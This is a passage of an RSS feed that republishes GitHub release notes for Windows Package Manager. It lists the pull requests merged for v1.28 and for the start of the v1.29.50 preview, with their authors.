<li>Extract event log for potential crash info by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3518633143" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5807" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5807/hovercard" href="https://github.com/microsoft/winget-cli/pull/5807">#5807</a></li>
<li>Update CODEOWNERS to include winget-developers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3649373914" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5891" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5891/hovercard" href="https://github.com/microsoft/winget-cli/pull/5891">#5891</a></li>
<li>Fixes for VS2026 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3665007222" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5896" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5896/hovercard" href="https://github.com/microsoft/winget-cli/pull/5896">#5896</a></li>
<li>Additional logging limitations and control by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3639765799" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5888" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5888/hovercard" href="https://github.com/microsoft/winget-cli/pull/5888">#5888</a></li>
<li>Use hybrid CRT linkage instead of full static by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3713123433" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5913" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5913/hovercard" href="https://github.com/microsoft/winget-cli/pull/5913">#5913</a></li>
<li>Enable source reference to get thread globals for off-thread logging by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3496366336" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5780" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5780/hovercard" href="https://github.com/microsoft/winget-cli/pull/5780">#5780</a></li>
<li>Fix JSON, missing closing brace by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/doterik/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/doterik">@doterik</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3725749076" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5924" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5924/hovercard" href="https://github.com/microsoft/winget-cli/pull/5924">#5924</a></li>
<li>Test host for in-proc COM module validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3700306254" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5910" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5910/hovercard" href="https://github.com/microsoft/winget-cli/pull/5910">#5910</a></li>
<li>Add sleep to allow background threads to quiesce by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3736500167" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5933" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5933/hovercard" href="https://github.com/microsoft/winget-cli/pull/5933">#5933</a></li>
<li>Allow suppressing configuration output on test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3503762781" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5794" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5794/hovercard" href="https://github.com/microsoft/winget-cli/pull/5794">#5794</a></li>
<li>Enable Explicit toggling for sources (i.e. Enable/Disable) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3682063243" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5904" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5904/hovercard" href="https://github.com/microsoft/winget-cli/pull/5904">#5904</a></li>
<li>Fix fuzz build by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3736419630" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5932" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5932/hovercard" href="https://github.com/microsoft/winget-cli/pull/5932">#5932</a></li>
<li>Normalize directory separators when adding packages to path by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3504149438" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5796" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5796/hovercard" href="https://github.com/microsoft/winget-cli/pull/5796">#5796</a></li>
<li>Add sleep to another inproc test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3740622150" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5935" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5935/hovercard" href="https://github.com/microsoft/winget-cli/pull/5935">#5935</a></li>
<li>Don't build inproc testbed for fuzzing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3745058247" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5937" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5937/hovercard" href="https://github.com/microsoft/winget-cli/pull/5937">#5937</a></li>
<li>Create schema 1.12.0 folder by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3757864843" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5944" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5944/hovercard" href="https://github.com/microsoft/winget-cli/pull/5944">#5944</a></li>
<li>Fix names of 1.12 Schemas by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3757909234" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5945" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5945/hovercard" href="https://github.com/microsoft/winget-cli/pull/5945">#5945</a></li>
<li>Fix Font feature property name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3758021326" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5946" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5946/hovercard" href="https://github.com/microsoft/winget-cli/pull/5946">#5946</a></li>
<li>Add check to ensure vcpkg triplets match across projects by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3771462095" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5950" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5950/hovercard" href="https://github.com/microsoft/winget-cli/pull/5950">#5950</a></li>
<li>Update release notes for v1.28 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3786109953" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5957" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5957/hovercard" href="https://github.com/microsoft/winget-cli/pull/5957">#5957</a></li>
<li>Details output option for <code>list</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3748529639" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5939" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5939/hovercard" href="https://github.com/microsoft/winget-cli/pull/5939">#5939</a></li>
<li>PowerShell Repair enhancements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3395519393" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5711" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5711/hovercard" href="https://github.com/microsoft/winget-cli/pull/5711">#5711</a></li>
<li>Allow inproc callers to disable termination signal handlers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3789855368" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5958" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5958/hovercard" href="https://github.com/microsoft/winget-cli/pull/5958">#5958</a></li>
<li>Add manifest version to WinGetUtilInterop by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/msftrubengu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/msftrubengu">@msftrubengu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3794767294" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5964" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5964/hovercard" href="https://github.com/microsoft/winget-cli/pull/5964">#5964</a></li>
<li>Fixes for updating winget from winget by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3806959508" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5972" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5972/hovercard" href="https://github.com/microsoft/winget-cli/pull/5972">#5972</a></li>
<li>Diagnostics and fix for pipeline test failures by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3810295053" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5975" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5975/hovercard" href="https://github.com/microsoft/winget-cli/pull/5975">#5975</a></li>
<li>Escape caller in user agent header by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3840346247" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5998" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5998/hovercard" href="https://github.com/microsoft/winget-cli/pull/5998">#5998</a></li>
<li>Add DSC resource list to manifest by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3839410468" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5997" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5997/hovercard" href="https://github.com/microsoft/winget-cli/pull/5997">#5997</a></li>
<li>Add command builder with escaped user input by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3817973099" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5982" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5982/hovercard" href="https://github.com/microsoft/winget-cli/pull/5982">#5982</a></li>
<li>Add missing closing brace in settings.export.schema.0.1.json by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DuckDuckStudio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DuckDuckStudio">@DuckDuckStudio</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3853198617" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6004" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6004/hovercard" href="https://github.com/microsoft/winget-cli/pull/6004">#6004</a></li>
<li>Turn off PWSH UT build in Fuzzing and ReleaseStatic for all platforms by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3857311162" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6005" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6005/hovercard" href="https://github.com/microsoft/winget-cli/pull/6005">#6005</a></li>
<li>Remove experimental feature gate on source edit by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3857921476" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6006" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6006/hovercard" href="https://github.com/microsoft/winget-cli/pull/6006">#6006</a></li>
<li>Update ReleaseNotes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3862674095" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6007" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6007/hovercard" href="https://github.com/microsoft/winget-cli/pull/6007">#6007</a></li>
<li>Make list details stable (1.28) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3889711357" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6021" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6021/hovercard" href="https://github.com/microsoft/winget-cli/pull/6021">#6021</a></li>
<li>Move to IReference rather than custom enum for optional bool (1.28) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3893659251" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6024" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6024/hovercard" href="https://github.com/microsoft/winget-cli/pull/6024">#6024</a></li>
<li>Apply latest localization patch (1.28) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3893720482" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6025" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6025/hovercard" href="https://github.com/microsoft/winget-cli/pull/6025">#6025</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mohiuddin-khan-shiam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mohiuddin-khan-shiam">@mohiuddin-khan-shiam</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3186146724" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5564" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5564/hovercard" href="https://github.com/microsoft/winget-cli/pull/5564">#5564</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/doterik/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/doterik">@doterik</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3725749076" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5924" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5924/hovercard" href="https://github.com/microsoft/winget-cli/pull/5924">#5924</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/microsoft/winget-cli/compare/v1.11.400...v1.28.220"><tt>v1.11.400...v1.28.220</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows Package Manager 1.29.50-preview]]></title>
<description><![CDATA[This is a preview build of WinGet for those interested in trying out upcoming features and fixes. While it has had some use and should be free of major issues, it may have bugs or usability problems. If you find any, please help us out by filing an issue.
New in v1.29

What's Changed

PowerShell ...]]></description>
<link>https://tsecurity.de/de/3601258/downloads/windows-package-manager-12950-preview/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601258/downloads/windows-package-manager-12950-preview/</guid>
<pubDate>Tue, 16 Jun 2026 11:31:54 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is a preview build of WinGet for those interested in trying out upcoming features and fixes. While it has had some use and should be free of major issues, it may have bugs or usability problems. If you find any, please help us out by <a href="https://github.com/microsoft/winget-cli/issues">filing an issue</a>.</p>
<h2>New in v1.29</h2>

<h2>What's Changed</h2>
<ul>
<li>PowerShell Repair enhancements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3395519393" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5711" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5711/hovercard" href="https://github.com/microsoft/winget-cli/pull/5711">#5711</a></li>
<li>Allow inproc callers to disable termination signal handlers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3789855368" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5958" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5958/hovercard" href="https://github.com/microsoft/winget-cli/pull/5958">#5958</a></li>
<li>Add manifest version to WinGetUtilInterop by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/msftrubengu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/msftrubengu">@msftrubengu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3794767294" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5964" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5964/hovercard" href="https://github.com/microsoft/winget-cli/pull/5964">#5964</a></li>
<li>Fixes for updating winget from winget by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3806959508" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5972" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5972/hovercard" href="https://github.com/microsoft/winget-cli/pull/5972">#5972</a></li>
<li>Diagnostics and fix for pipeline test failures by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3810295053" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5975" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5975/hovercard" href="https://github.com/microsoft/winget-cli/pull/5975">#5975</a></li>
<li>Escape caller in user agent header by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3840346247" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5998" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5998/hovercard" href="https://github.com/microsoft/winget-cli/pull/5998">#5998</a></li>
<li>Add DSC resource list to manifest by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3839410468" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5997" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5997/hovercard" href="https://github.com/microsoft/winget-cli/pull/5997">#5997</a></li>
<li>Add command builder with escaped user input by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3817973099" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5982" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5982/hovercard" href="https://github.com/microsoft/winget-cli/pull/5982">#5982</a></li>
<li>Add missing closing brace in settings.export.schema.0.1.json by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DuckDuckStudio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DuckDuckStudio">@DuckDuckStudio</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3853198617" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6004" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6004/hovercard" href="https://github.com/microsoft/winget-cli/pull/6004">#6004</a></li>
<li>Turn off PWSH UT build in Fuzzing and ReleaseStatic for all platforms by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3857311162" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6005" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6005/hovercard" href="https://github.com/microsoft/winget-cli/pull/6005">#6005</a></li>
<li>Remove experimental feature gate on source edit by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3857921476" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6006" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6006/hovercard" href="https://github.com/microsoft/winget-cli/pull/6006">#6006</a></li>
<li>Update ReleaseNotes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3862674095" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6007" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6007/hovercard" href="https://github.com/microsoft/winget-cli/pull/6007">#6007</a></li>
<li>Make list details stable by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3888464623" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6020" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6020/hovercard" href="https://github.com/microsoft/winget-cli/pull/6020">#6020</a></li>
